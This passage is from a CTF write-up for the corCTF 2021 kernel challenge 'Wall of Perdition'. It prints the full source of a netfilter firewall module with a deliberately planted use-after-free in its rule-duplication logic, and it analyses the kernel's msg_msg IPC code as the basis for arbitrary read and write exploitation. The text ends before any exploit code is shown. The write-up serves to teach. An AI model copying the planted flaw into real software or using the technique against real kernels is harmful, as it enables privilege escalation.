/ CTF, RESEARCH

[corCTF 2021] Wall Of Perdition: Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

Wall of Perdition is the second and harder part of a two-part series of kernel exploitation challenges designed by FizzBuzz101 and me for corCTF 2021. You can find the writeup for the first part, Fire of Salvation, on his blog. Unfortunately, both challenges remained unsolved during the competition. Wall of Perdition consists of a vulnerable Linux Kernel Module; the bug is a 0x30 bytes Use After Free Write in kmalloc-64. With this challenge, we present an innovative approach that turns the Linux kernel’s IPC mechanism, more specifically message operations, into a powerful exploitation toolkit. Let’s jump in!

Overview

For this challenge, we decided to write a kernel firewall, based on NetFilter, controllable from user space via ioctl(). A user can add rules, edit rules, delete rules and duplicate rules (from the inbound list to the outbound list and vice versa).

We used the FGKASLR branch of the Linux kernel. Function Granular Kernel Address Space Layout Randomization increases the level of protection offered by KASLR: while KASLR moves the entire kernel text to a random location at boot time, FGKASLR rearranges the kernel code at load time with per-function granularity. This makes code reuse attacks very difficult to accomplish, as knowing the kernel base address (from a memory leak, for example) is no longer a sufficient condition to calculate the address of an arbitrary function.

Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) are enabled, so it is neither possible to execute user space code from kernel space, nor to access data in higher CPU rings without going through dedicated functions like copy_from_user() / copy_to_user(), which temporarily set the AC flag in EFLAGS (via the stac/clac instructions) before accessing data in user space.

As additional protections, we set CONFIG_STATIC_USERMODEHELPER to true, forcing all usermode helper calls through a single binary, and we set CONFIG_STATIC_USERMODEHELPER_PATH to an empty string. This way it is impossible to overwrite targets like modprobe_path, core_pattern and so on to make the kernel execute an arbitrary binary.

Finally, we decided to use the SLAB allocator instead of SLUB to prevent any attempt at freelist poisoning, an attack that we will discuss in a future article. Freelist randomization was also enabled.

You can find the challenge, with the complete kernel configuration, here: Wall of Perdition

A Buggy Linux Kernel Firewall

We decided to release the firewall source code, so players could focus directly on the exploitation phase without having to reverse engineer the module first. Here is the source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>


MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");


#define DEVICE_NAME "firewall"
#define CLASS_NAME  "firewall"

#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80

#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1

#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif


typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} user_rule_t;

typedef struct
{
    char iface[16];
    char name[16];
    uint32_t ip;
    uint32_t netmask;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    uint8_t is_duplicated;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} rule_t;

rule_t **firewall_rules_in;
rule_t **firewall_rules_out;

static DEFINE_MUTEX(firewall_lock);

static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);

static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};

static struct nf_hook_ops in_hook = {
  .hook        = firewall_inbound_hook,
  .hooknum     = NF_INET_PRE_ROUTING,
  .pf          = PF_INET,
  .priority    = NF_IP_PRI_FIRST
};

static struct nf_hook_ops out_hook = {
  .hook        = firewall_outbound_hook,
  .hooknum     = NF_INET_POST_ROUTING,
  .pf          = PF_INET,
  .priority    = NF_IP_PRI_FIRST
};


static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    int ret;
    user_rule_t user_rule;
    rule_t **firewall_rules;

    mutex_lock(&firewall_lock);
    memset(&user_rule, 0, sizeof(user_rule_t));

    if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if (user_rule.idx >= MAX_RULES)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;

    switch (cmd)
    {
        case ADD_RULE:
            ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DELETE_RULE:
            ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case SHOW_RULE:
            ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case EDIT_RULE:
            ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DUP_RULE:
            ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        default:
            ret = ERROR;
            break;
    }

    mutex_unlock(&firewall_lock);

    return ret;
}


static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");

    if (firewall_rules[idx] != NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
        return ERROR;
    }

    firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);

    if (!firewall_rules[idx])
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    #ifdef EASY_MODE
    strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
    #endif

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;
    firewall_rules[idx]->is_duplicated = 0;

    printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");

    return SUCCESS;
}


static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
        return ERROR;
    }

    kfree(firewall_rules[idx]); // [3]
    firewall_rules[idx] = NULL;

    return SUCCESS;
}


static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");

    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
    #endif

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;

    printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");

    return SUCCESS;
}


static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
    return ERROR;
}


static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    uint8_t i;
    rule_t **dup;

    printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");

    dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
        return ERROR;
    }

    if (firewall_rules[idx]->is_duplicated)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
        return ERROR;
    }

    for (i = 0; i < MAX_RULES; i++)
    {
        if (dup[i] == NULL)
        {
            dup[i] = firewall_rules[idx];
            firewall_rules[idx]->is_duplicated = 1;
            printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
            return SUCCESS;
        }
    }

    printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");

    return ERROR;
}


static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
    struct iphdr *iph;
    struct tcphdr *tcph;
    struct udphdr *udph;

    printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
    printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);

    if (strncmp(rule->iface, skb->dev->name, 16) != 0)
    {
        printk(KERN_INFO "[Firewall::Error] Rule[%d], inferface doesn't match, skipping!\n", i);
        return SKIP;
    }

    iph = ip_hdr(skb);

    if (type == INBOUND)
    {
        if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }
    else
    {
        if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }

    if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);

        tcph = tcp_hdr(skb);

        if ((rule->port != 0) && (rule->port != tcph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);

        udph = udp_hdr(skb);

        if ((rule->port != 0) && (rule->port != udph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    return SKIP;
}


static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i])
        {
            ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_out[i])
        {
            ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static int init_firewall(void)
{
    mutex_init(&firewall_lock);

    firewall_device.minor = MISC_DYNAMIC_MINOR;
    firewall_device.name = DEVICE_NAME;
    firewall_device.fops = &firewall_fops;

    if (misc_register(&firewall_device))
    {
        printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");

    firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
    firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);

    if (nf_register_net_hook(&init_net, &in_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    if (nf_register_net_hook(&init_net, &out_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
    #else
    printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
    #endif
    return SUCCESS;
}


static void cleanup_firewall(void)
{
    int i;

    printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i] != NULL)
        {
            kfree(firewall_rules_in[i]);
        }

        if (firewall_rules_out[i] != NULL)
        {
            kfree(firewall_rules_out[i]);
        }
    }

    memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
    memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);

    kfree(firewall_rules_in);
    firewall_rules_in = NULL;

    kfree(firewall_rules_out);
    firewall_rules_out = NULL;

    nf_unregister_net_hook(&init_net, &in_hook);
    nf_unregister_net_hook(&init_net, &out_hook);

    misc_deregister(&firewall_device);
    mutex_destroy(&firewall_lock);

    printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}


module_init(init_firewall);
module_exit(cleanup_firewall);

As we mentioned in the introduction, a user can interact with the firewall using ioctl(). There are five exposed operations: firewall_add_rule(), firewall_delete_rule(), firewall_edit_rule(), firewall_show_rule() and firewall_dup_rule(). As we can see from the source code, firewall_show_rule(), despite being exposed, is not implemented.

The firewall is based on NetFilter and uses two NetFilter hooks: a prerouting hook to filter incoming packets and a postrouting hook to filter outgoing packets. For this reason the source code keeps two lists of pointers to rules, firewall_rules_in and firewall_rules_out. Each of these lists can contain up to 128 pointers to rules.


The request format used to interact with the firewall is defined by the type user_rule_t. The IP address and netmask are received by the kernel in character buffers and are subsequently converted to integers in kernel space, as we can see in firewall_add_rule() and firewall_edit_rule(). Other required fields include the interface name, rule name, rule index, port, type (0 for inbound, 1 for outbound), protocol, and the action to be taken when there is a match in process_rule().

Once the IP and netmask have been converted to integers, the user request is transferred into a new structure handled by the kernel, defined by the type rule_t. This structure is allocated in kmalloc-64, since its size is 0x30 bytes.

Because the exploitation phase is relatively complex, we decided to make the bug really easy to spot. firewall_dup_rule() allows users to duplicate rules from the list firewall_rules_in to the list firewall_rules_out and vice versa. The problem arises if we duplicate a rule and then free it using firewall_delete_rule(): firewall_delete_rule() calls kfree() on the pointer to the rule and then sets it to NULL, but the same pointer is still accessible from the other list! This leads to a 0x30 bytes Use After Free Write in kmalloc-64, triggered by using firewall_edit_rule() to modify the freed, but still accessible, rule.

A Dive Into Linux Kernel’s IPC

To exploit the UAF in kmalloc-64, we are going to abuse the Linux kernel’s IPC mechanism, more specifically message operations. For this reason we need to take a quick dive into some of its features.

The kernel offers two syscalls to perform Inter Process Communication using messages: msgsnd() and msgrcv(), used respectively to send messages to, and receive messages from, a message queue. A message in kernel space is composed of two parts: a message header, described by the structure msg_msg, and the message data, which follows immediately afterwards. Here is the msg_msg structure:

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

This elastic object is extensively used by kernel exploit developers to perform heap sprays, since the size of the message is controlled by the user and the object can therefore be allocated in multiple caches, from kmalloc-64 up to kmalloc-4096.

Every time we use msgsnd() to send a message, the kernel calls do_msgsnd(), which calls load_msg(), which in turn calls alloc_msg() to allocate, in the appropriate slabs, the objects that will contain the message header and the message data. Afterwards the message content is copied from user space to kernel space using copy_from_user() in load_msg().

For example, let’s say we want to send a message consisting of 0x1fc8 ‘A’s: we first create a message queue using msgget(), then we send the actual message using msgsnd():

[...]

struct msgbuf
{
    long mtype;
    char mtext[0x1fc8];
} msg;

msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));

qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
msgsnd(qid, &msg, sizeof(msg.mtext), 0);

[...]

Now let’s examine the source code of alloc_msg() and load_msg() to understand what happens in kernel space:

static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG); // [1]
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
	if (msg == NULL)
		return NULL;

	msg->next = NULL;
	msg->security = NULL;

	len -= alen; // [3]
	pseg = &msg->next;
	while (len > 0) {
		struct msg_msgseg *seg;

		cond_resched();

		alen = min(len, DATALEN_SEG); // [4]
		seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
		if (seg == NULL)
			goto out_err;
		*pseg = seg; // [6]
		seg->next = NULL;
		pseg = &seg->next;
		len -= alen;
	}

	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

As we can see in the source code above, in alloc_msg(), the kernel calculates alen = min(len, DATALEN_MSG); [1], where len is the message size provided by the user, 0x1fc8 in our case, and DATALEN_MSG corresponds to ((size_t)PAGE_SIZE - sizeof(struct msg_msg)). Since by default PAGE_SIZE is equal to 0x1000 bytes, and sizeof(struct msg_msg) is equal to 0x30 bytes, DATALEN_MSG corresponds to 0xfd0 bytes, and that line, in our case, will result in alen = min(0x1fc8, 0xfd0) = 0xfd0.

At the next line, the kernel allocates the message using msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); [2]. Here sizeof(*msg) is equal to 0x30 bytes (it is nothing more than msg_msg) and alen, as we discussed above, is equal to 0xfd0. So that line, in our case, will be equal to msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. This message will be allocated in kmalloc-4096.

After a couple of lines, len, the message size provided by the user, is decremented by alen [3], then the kernel starts allocating the required segments, connected in a singly linked list, as long as len > 0. The size of a segment is determined by alen = min(len, DATALEN_SEG); [4]. Since len has just been decremented by alen, it now corresponds to len = len - alen = 0x1fc8 - 0xfd0 = 0xff8. DATALEN_SEG is defined as ((size_t)PAGE_SIZE - sizeof(struct msg_msgseg)), and since sizeof(struct msg_msgseg) is equal to 0x8 bytes, DATALEN_SEG corresponds to 0xff8 bytes. So that line will result in alen = min(0xff8, 0xff8) = 0xff8;.

At the next line, the segment is allocated using seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); [5]. Since sizeof(*seg) is equal to 0x8 bytes and alen is now 0xff8, that line will be equal to seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. This segment, too, will be allocated in kmalloc-4096.

Finally the pointer to the segment is saved in the message header [6], and the function can return the pointer to the message. Now load_msg() is ready to copy the message content from user space to kernel space:

struct msg_msg *load_msg(const void __user *src, size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg *seg;
	int err = -EFAULT;
	size_t alen;

	msg = alloc_msg(len); // [1]
	if (msg == NULL)
		return ERR_PTR(-ENOMEM);

	alen = min(len, DATALEN_MSG);
	if (copy_from_user(msg + 1, src, alen)) // [2]
		goto out_err;

	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		src = (char __user *)src + alen;
		alen = min(len, DATALEN_SEG);
		if (copy_from_user(seg + 1, src, alen)) // [3]
			goto out_err;
	}

	err = security_msg_msg_alloc(msg);
	if (err)
		goto out_err;

	return msg;

out_err:
	free_msg(msg);
	return ERR_PTR(err);
}

As we can see from the load_msg() source code, after allocating the message using alloc_msg() [1], it starts copying the message data from user space into the allocated memory region in kernel space using copy_from_user(), based on the size of alen [2]. Then it copies the remaining parts of the message into the various segments [3]. In our case it will copy the first 0xfd0 bytes of our data into the message, and the remaining 0xff8 bytes into the segment. Since in our case there is only a single segment, its pointer to the next segment is NULL.

Here is our message in kernel memory:

[figure: the msg_msg header followed by the first 0xfd0 bytes of message data in kernel memory]

And here is the corresponding segment:

[figure: the msg_msgseg header followed by the remaining 0xff8 bytes of message data]

Now let’s see what happens when we use msgrcv() to receive the message:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);

First, the kernel calls do_msgrcv(), setting its sixth argument, the msg_handler() function pointer, to do_msg_fill() as we can see in ksys_msgrcv():

long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
		 long msgtyp, int msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

Later on, do_msg_fill() will be used to copy the message from kernel space to user space. Here is the source code of do_msgrcv():

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
	       long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
	int mode;
	struct msg_queue *msq;
	struct ipc_namespace *ns;
	struct msg_msg *msg, *copy = NULL;
	DEFINE_WAKE_Q(wake_q);

	ns = current->nsproxy->ipc_ns;

	if (msqid < 0 || (long) bufsz < 0)
		return -EINVAL;

	if (msgflg & MSG_COPY) {
		if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
			return -EINVAL;
		copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
		if (IS_ERR(copy))
			return PTR_ERR(copy);
	}
	mode = convert_mode(&msgtyp, msgflg);

	rcu_read_lock();
	msq = msq_obtain_object_check(ns, msqid);
	if (IS_ERR(msq)) {
		rcu_read_unlock();
		free_copy(copy);
		return PTR_ERR(msq);
	}

	for (;;) {
		struct msg_receiver msr_d;

		msg = ERR_PTR(-EACCES);
		if (ipcperms(ns, &msq->q_perm, S_IRUGO))
			goto out_unlock1;

		ipc_lock_object(&msq->q_perm);

		/* raced with RMID? */
		if (!ipc_valid_object(&msq->q_perm)) {
			msg = ERR_PTR(-EIDRM);
			goto out_unlock0;
		}

		msg = find_msg(msq, &msgtyp, mode); // [1]
		if (!IS_ERR(msg)) {
			/*
			 * Found a suitable message.
			 * Unlink it from the queue.
			 */
			if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
				msg = ERR_PTR(-E2BIG);
				goto out_unlock0;
			}
			/*
			 * If we are copying, then do not unlink message and do
			 * not update queue parameters.
			 */
			if (msgflg & MSG_COPY) {
				msg = copy_msg(msg, copy); // [5]
				goto out_unlock0;
			}

			list_del(&msg->m_list);
			msq->q_qnum--;
			msq->q_rtime = ktime_get_real_seconds();
			ipc_update_pid(&msq->q_lrpid, task_tgid(current));
			msq->q_cbytes -= msg->m_ts;
			atomic_sub(msg->m_ts, &ns->msg_bytes);
			atomic_dec(&ns->msg_hdrs);
			ss_wakeup(msq, &wake_q, false);

			goto out_unlock0;
		}

		/* No message waiting. Wait for a message */
		if (msgflg & IPC_NOWAIT) {
			msg = ERR_PTR(-ENOMSG);
			goto out_unlock0;
		}

		list_add_tail(&msr_d.r_list, &msq->q_receivers);
		msr_d.r_tsk = current;
		msr_d.r_msgtype = msgtyp;
		msr_d.r_mode = mode;
		if (msgflg & MSG_NOERROR)
			msr_d.r_maxsize = INT_MAX;
		else
			msr_d.r_maxsize = bufsz;

		/* memory barrier not require due to ipc_lock_object() */
		WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));

		/* memory barrier not required, we own ipc_lock_object() */
		__set_current_state(TASK_INTERRUPTIBLE);

		ipc_unlock_object(&msq->q_perm);
		rcu_read_unlock();
		schedule();

		/*
		 * Lockless receive, part 1:
		 * We don't hold a reference to the queue and getting a
		 * reference would defeat the idea of a lockless operation,
		 * thus the code relies on rcu to guarantee the existence of
		 * msq:
		 * Prior to destruction, expunge_all(-EIRDM) changes r_msg.
		 * Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
		 */
		rcu_read_lock();

		/*
		 * Lockless receive, part 2:
		 * The work in pipelined_send() and expunge_all():
		 * - Set pointer to message
		 * - Queue the receiver task for later wakeup
		 * - Wake up the process after the lock is dropped.
		 *
		 * Should the process wake up before this wakeup (due to a
		 * signal) it will either see the message and continue ...
		 */
		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN)) {
			/* see MSG_BARRIER for purpose/pairing */
			smp_acquire__after_ctrl_dep();

			goto out_unlock1;
		}

		 /*
		  * ... or see -EAGAIN, acquire the lock to check the message
		  * again.
		  */
		ipc_lock_object(&msq->q_perm);

		msg = READ_ONCE(msr_d.r_msg);
		if (msg != ERR_PTR(-EAGAIN))
			goto out_unlock0;

		list_del(&msr_d.r_list);
		if (signal_pending(current)) {
			msg = ERR_PTR(-ERESTARTNOHAND);
			goto out_unlock0;
		}

		ipc_unlock_object(&msq->q_perm);
	}

out_unlock0:
	ipc_unlock_object(&msq->q_perm);
	wake_up_q(&wake_q);
out_unlock1:
	rcu_read_unlock();
	if (IS_ERR(msg)) {
		free_copy(copy);
		return PTR_ERR(msg);
	}

	bufsz = msg_handler(buf, msg, bufsz); // [2]
	free_msg(msg); // [3]

	return bufsz;
}

As we can see from the source code above, in do_msgrcv() the kernel uses find_msg() to locate the requested message [1]. Then, on success, after performing some checks and unlinking the message from the message queue, it calls msg_handler(), previously set to do_msg_fill(), to copy the message from kernel space to user space [2]:

static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
	struct msgbuf __user *msgp = dest;
	size_t msgsz;

	if (put_user(msg->m_type, &msgp->mtype))
		return -EFAULT;

	msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [1]
	if (store_msg(msgp->mtext, msg, msgsz)) // [2]
		return -EFAULT;
	return msgsz;
}

do_msg_fill() checks whether the requested message size is greater than the size saved in msg->m_ts [1]. If the requested size exceeds the size stored in the message header, it copies only m_ts bytes; otherwise it uses the size provided by the user. This check prevents an Out Of Bounds Read when the user calls msgrcv(). In our case, msgsz will be 0x1fc8 bytes.

Finally, store_msg() is called [2] to copy msgsz bytes (0x1fc8 in our case) from kernel space to the buffer provided by the user in user space:

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
	size_t alen;
	struct msg_msgseg *seg;

	alen = min(len, DATALEN_MSG); // [1]
	if (copy_to_user(dest, msg + 1, alen)) // [2]
		return -1;

	for (seg = msg->next; seg != NULL; seg = seg->next) { // [3]
		len -= alen;
		dest = (char __user *)dest + alen;
		alen = min(len, DATALEN_SEG); // [4]
		if (copy_to_user(dest, seg + 1, alen)) // [5]
			return -1;
	}
	return 0;
}

